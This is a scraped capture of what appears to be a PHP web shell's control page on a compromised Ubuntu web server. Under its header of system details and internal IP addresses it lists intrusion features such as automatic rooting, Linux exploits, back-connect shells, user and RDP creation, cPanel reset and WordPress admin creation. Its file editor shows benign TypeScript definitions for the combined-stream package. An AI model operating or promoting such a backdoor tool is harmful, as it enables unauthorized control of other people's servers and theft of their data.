Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
combined-stream /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.95
KB
-rw-r--r--
package.json
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for combined-stream 1.0 // Project: https://github.com/felixge/node-combined-stream // Definitions by: Felix Geisendörfer <https://github.com/felixge>, Tomek Łaziuk <https://github.com/tlaziuk>, Kon Pik <https://github.com/konpikwastaken> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped /// <reference types="node" /> import { Stream } from 'stream'; type Appendable = NodeJS.ReadableStream | NodeJS.WritableStream | Buffer | string | NextFunction; type NextFunction = (next: (stream: Appendable) => any) => any; interface Options { maxDataSize?: number | undefined; pauseStreams?: boolean | undefined; } declare class CombinedStream extends Stream implements Options { readonly writable: boolean; readonly readable: boolean; readonly dataSize: number; maxDataSize: number; pauseStreams: boolean; append(stream: Appendable): this; write(data: any): void; pause(): void; resume(): void; end(): void; destroy(): void; // private properties _released: boolean; // @TODO it should be a type of Array<'delayed-stream' instance | Buffer | string> _streams: Array<Stream | Buffer | string>; _currentStream: Stream | Buffer | string | null; _getNext(): void; _pipeNext(): void; _handleErrors(stream: NodeJS.EventEmitter): void; _reset(): void; _checkDataSize(): void; _updateDataSize(): void; _emitError(error: Error): void; // events on(event: 'close' | 'end' | 'resume' | 'pause', cb: () => void): this; on(event: 'error', cb: (err: Error) => void): this; on(event: 'data', cb: (data: any) => void): this; once(event: 'close' | 'end' | 'resume' | 'pause', cb: () => void): this; once(event: 'error', cb: (err: Error) => void): this; once(event: 'data', cb: (data: any) => void): this; static create(options?: Options): CombinedStream; static isStreamLike(stream: any): stream is Stream; } export = CombinedStream;
Close